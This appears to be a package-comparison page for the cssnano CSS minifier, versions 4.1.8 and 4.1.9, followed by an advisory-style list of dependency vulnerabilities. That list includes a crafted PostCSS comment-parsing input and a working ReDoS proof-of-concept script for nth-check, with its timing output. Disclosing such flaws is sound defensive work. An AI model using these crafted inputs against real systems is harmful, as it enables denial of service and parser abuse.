Cssnano, a modular CSS minifier built upon the PostCSS ecosystem, saw a release of version 4.1.9 following the previous stable version 4.1.8. Developers considering upgrading should note the key differences. The primary change lies in updated dependencies. Version 4.1.9 incorporates a newer version of cssnano-preset-default, moving from 4.0.6 to 4.0.7. This preset is crucial as it defines the default set of optimizations applied during minification. Therefore, upgrading could subtly alter the final compressed CSS output.
Furthermore, there's a change in the development dependencies. cssnano-preset-advanced sees an update in version 4.1.9, jumping from 4.0.2 to 4.0.7. While this primarily affects the development environment used for building and testing cssnano itself, it indirectly impacts developers who contribute to the project or rely on developer tools integrated with cssnano. The updated advanced preset might introduce different or more refined optimization strategies used during development. Also, the unpacked size increased slightly, from 28053 to 29457, which might be worth to monitor if you are sensible to the size of the library.
Both versions depend on core libraries like postcss, cosmiconfig, and is-resolvable using the same version constraints. This ensures a consistently supported PostCSS environment. The core functionalities and developer experience remain largely unaffected, making the upgrade relatively smooth. Ultimately, the upgrade from 4.1.8 to 4.1.9 is a minor one, primarily focused on preset updates that could influence minification behavior. Developers should test their CSS after upgrading to verify desired output.
All the vulnerabilities related to the version 4.1.9 of the package
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms